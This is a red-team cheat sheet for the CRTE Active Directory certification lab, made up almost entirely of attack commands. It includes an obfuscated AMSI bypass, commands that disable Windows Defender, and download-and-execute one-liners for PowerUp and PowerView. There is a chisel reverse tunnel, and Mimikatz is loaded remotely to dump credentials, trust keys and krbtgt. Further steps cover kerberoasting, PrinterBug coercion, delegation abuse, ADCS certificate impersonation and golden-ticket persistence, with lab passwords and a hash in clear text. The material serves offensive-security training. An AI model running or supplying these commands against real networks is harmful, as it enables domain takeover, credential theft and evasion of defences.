backtick

Appearance

CRTE - Certified Red Team Expert

  1. Amsi bypass - PowerUp - Disabilitare firewall e Defender - Chisel
bash
xfreerdp /u:studentuser /p:'password' /v:192.168.100.19:3389 /h:1080 /w:1920 /floatbar /smart-sizing -grab-keyboard +drive:shared,./shared
powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
powershell
iex (iwr http://host/powerup.ps1 -UseBasicParsing)
Invoke-AllChecks
Invoke-ServiceAbuse -Name ALG -UserName us\studentuserx -Verbose
powershell
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
bash
/t/chisel64 server -p 4437 --reverse
powershell
iwr http://host/chisel.exe -outfile chisel.exe
.\chisel.exe client 192.168.99.19:4437 R:8880:socks
  1. bloodhound.py
bash
sock bloodhound-python -dc dbvendor.local. -ns 192.168.23.1 -d dbvendor.local -u db19svc -p 'Password123!' --dns-tcp --dns-timeout 10
  1. kerberoasting
bash
sock GetUserSPNs.py us.techcorp.local/studentuser:password -target-domain eu.local -outputfile kerberoast_eu.local
hashcat kerberoast_eu.local adtools/kerberoast/10k-worst-pass.txt

Once you have access to a normal machine:

  1. mimikatz logonpasswords, vault cred
powershell
iwr http://host/elara_pe_win64.exe -outfile elara_pe_win64.exe
.\elara_pe_win64.exe http://host/mimikatz.exe privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys '""lsadump::lsa /patch""' '""lsadump::trust /patch""' vault::cred exit
  1. check if user has access to other machines
bash
sock nxc smb hosts -u user -p pass
powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Find-LocalAdminAccess -Verbose
  1. enumerate file system
powershell
cd c:\
dir
cd c:\users\user
tree /F
  1. enumerate local certificate store
powershell
certutil -store My
  1. check if any ACL has been missed by bloodhound
powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "managers"}
# to get more details
Get-DomainObjectAcl -Identity machineadmins -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match 'managers'}

Enumeration:

  1. Enumerate laps
bash
sock nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps
sock nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -O computer="us-d*"
  1. Enumerate gMSA
powershell
Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'
bash
sock bloodyAD --host 192.168.1.2 -u studentuser19 -p 'sP8wEmrK4BK2XzGv' -d us.techcorp.local get search --filter '(objectClass=msDS-GroupManagedServiceAccount)'
# check for msDS-GroupMSAMembership.ACL.Trustee to see who can read the password
bash
sock nxc ldap us-dc -u provisioningsvc -p 'T0OverseethegMSAaccounts!!' --gmsa
  1. Enumerate domains in the forest
powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Get-ForestDomain
  1. Enumerate trusts for the domain
powershell
Get-DomainTrust
Get-DomainTrust -Domain techcorp.local
  1. Enumerate trusts for the forest
powershell
Get-ForestTrust
  1. Enumerate external trusts
powershell
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}

In a bi-directional trust or Inbound one-way trust from eu.local to us.techcorp.local, we can extract information from the eu.local forest

powershell
Get-ForestTrust -Forest eu.local
  1. Enumerate machines trusted for unconstrained delegation
powershell
Get-DomainComputer -UnConstrained
bash

If there are machine and once pwned, you can extract tickets with sekurlsa::tickets if already present or force the domain controller to authenticate with printerbug

powershell
iwr http://host/Loader.exe -outfile Loader.exe
set-variable -name Pwn -Value monitor
.\Loader.exe -Path http://host/Rubeus.exe -args $Pwn /interval:5
bash
sock python printerbug.py us.techcorp.local/webmaster:'0wnerOftheIntraNetz!'@us-dc us-web
# you can also request authentication from the parent domain DC @techcorp-dc.techcorp.local (page 96)
base64 -d us-dc.ccache.b64 > us-dc.ccache.kirbi
ticketConverter.py ~/crte/us-dc.ccache.kirbi ~/crte/us-dc.ccache
KRB5CCNAME='us-dc.ccache' sock nxc smb us-dc --use-kcache
KRB5CCNAME='/home/chdoge/crte/us-dc.ccache' sock secretsdump.py us-dc.us.techcorp.local -k -no-pass -just-dc-user us/krbtgt

If TGT Delegation is enabled across forests trusts, we can abuse the printer bug across two-way forest trusts as well.

You can find TGT delegation status on bloodhound if you enumerated the other forest or check notes from the labs.

Assume it is enabled

  1. Enumerate machines trusted for constrained delegation
powershell
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

Assume Protocol transition is enabled for now

bash
sock getST.py -spn CIFS/us-mssql.us.techcorp.local -impersonate Administrator us.techcorp.local/appsvc:'Us$rT0AccessDBwithImpersonation' #-altservice HTTP
# both http and cifs work with secretsdump
KRB5CCNAME='Administrator@[email protected]' sock secretsdump.py us.techcorp.local/[email protected] -k -no-pass
  1. Enumerate ADCS
powershell
certutil -config - -ping
bash
sock nxc ldap 192.168.1.2 -u studentuser19 -p sP8wEmrK4BK2XzGv -M adcs -o BASE_DN=DC=techcorp,DC=local
bash
sock certipy-ad find -u '[email protected]' -p 'sP8wEmrK4BK2XzGv' -dc-ip 192.168.1.2 -old-bloodhound
sock certipy-ad req -u "[email protected]" -hashes 36ea28bfa97a992b5e85bd22485e8d52 -dc-ip 192.168.1.2 -target Techcorp-DC.techcorp.local -target-ip 192.168.1.1 -ca 'TECHCORP-DC-CA' -template 'ForAdminsofPrivilegedAccessWorkstations' -upn 'Administrator' -debug # it is important to set target ip to make it work
sock certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.2 -username Administrator -domain us.techcorp.local
# you can also become enterprise admin, gotta investigate the reason
sock certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.1 -username Administrator -domain techcorp.local

KRB5CCNAME='administrator.ccache' sock nxc smb us-dc -u 'Administrator' --use-kcache
  1. Enumerate where Azure AD Connect is installed
bash
sock bloodyAD --host 192.168.1.1 -u studentuser19 -p 'sP8wEmrK4BK2XzGv' -d us.techcorp.local get search --filter '(samAccountName=MSOL_*)' --attr distinguishedName,description

dump creds with logonpasswords

powershell
.\elara_win64.exe pe -i http://student19:8000/mimikatz.exe -b dG9rZW46OmVsZXZhdGUgcHJpdmlsZWdlOjpkZWJ1ZyBzZWt1cmxzYTo6bG9nb25wYXNzd29yZHMgZXhpdA==

then dcsync

  1. elevate from child to domain using child trust key or krbtgt the trust key is equivalent to the hash of the user TECHCORP$ (techcorp.local domain) or US$ (us.techcorp.local domain)

  2. one you gain access to another forest, don't forget to run all checks again, including kerberoastable users

  3. Enumerate SQL access

powershell
iew (iwr http://host/PowerupSQL.psd1 -UseBasicParsing)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Trust

Intra-Forest Cross-Domain Trust Abuse (Different Domains inside the Same Forest). Do we have DA privileges on a domain INSIDE the forest?

  1. YES -> We can elevate our privileges to EA using the following methods:
    1. Abusing Parent-Child Trust Relationship to forge an Inter-Realm Golden Ticket. We need the krbtgt credentials of the compromised domain.
    2. Abusing the Trust Keys to forge an Inter-Realm Golden Ticket. We need the targetdomain$ credentials of the compromised domain.
    3. Abusing the KUD of the compromised domain’s DC (or other machine with similar privileges) and coercing the target domain’s DC to authenticate to it using PrinterBug to steal the TGT of the target DC’s machine account.
  2. NO
    1. Use Get-DomainForeignUser to find whether any user from our domain has access into other groups in the forest.
    2. Use Get-DomainForeignGroupMember -Domain OTHER.DOMAIN to see if groups in those other forest domains had "incoming" access.
    3. Kerberoasting

Inter-Forest Cross-Domain Attack (Different Domains in Different Forests)

  1. Bidirectional Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Bidirectional)
    • In that specific case, THE FOREST IS NOT A SECURITY BOUNDARY.
    • We may be able to abuse the KUD of the compromised domain’s DC (or other machine with similar privileges) and coercing the target domain’s DC to authenticate to it using PrinterBug to steal the TGT of the target DC’s machine account.
  2. Bidirectional Inter-Forest Cross-Domain Attack with Fully Implemented SID Filtering (FILTER_SIDS, Bidirectional)
    1. Enumerate for Local Group Membership on individual servers
    2. Enumerate for Foreign Security Principals on the target domain
    3. Enumerate for Foreign ACL Principals
    powershell
    Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local
    1. Kerberoasting
  3. One-Way Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Inbound)
    1. Enumerate for Local Group Membership on individual servers.
    2. Enumerate for Foreign Security Principals on the target domain:
    3. Enumerate for Foreign ACL Principals:
    4. Kerberoasting
  4. Bidirectional External Cross-Domain Attack with SID Filtering (TREAT_AS_EXTERNAL,FOREST_TRANSITIVE, Bidirectional)
    1. Enumerate for Local Group Membership on individual servers
    2. Enumerate for Foreign Security Principals on the target domain
    3. Enumerate for Foreign ACL Principals:
    4. Kerberoasting
    5. Find Interesting Domain Groups with SID-extention>1000 that could be used for SID History injection, in order to obtain the privileges of that group on the target domain. In order to abuse that, we will need the targetdomain$ credentials of the compromised domain.
    powershell
    Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local # sid of target domain
  5. Bastion Forests
    1. Look for a way to compromise the Bastion (Red) forest in order to easily gain access over all the managed Production forests.
    powershell
    Get-ADObject -LDAPFilter '(objectClass=foreignSecurityPrincipal)' -Server bastion-dc.bastion.local -Domain bastion.local
Get-ADGroup -Filter * -Properties Member -Server bastion.local | ?{$_.Member -match 'S-1-5-21-2781415573-3701854478-2406986946-500'}
    bash
    Get-DomainGroup -LDAPFilter '(member=CN=S-1-5-21-2781415573-3701854478-2406986946-500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local)'
    1. Check if there is a PAM trust PAM resource
    powershell
    Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
    bash
    Get-DomainTrust
    1. Check which users are memeber of the shadow principals
    powershell
    $bastiondc = New-PSSession bastion-dc.bastion.local
Get-ADObject -SearchBase 'CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local'
    if any user is member of prodforest-ShadowEnterpriseAdmin you're gucci

Persistance

  1. Golden ticket
  2. dcsync rights to user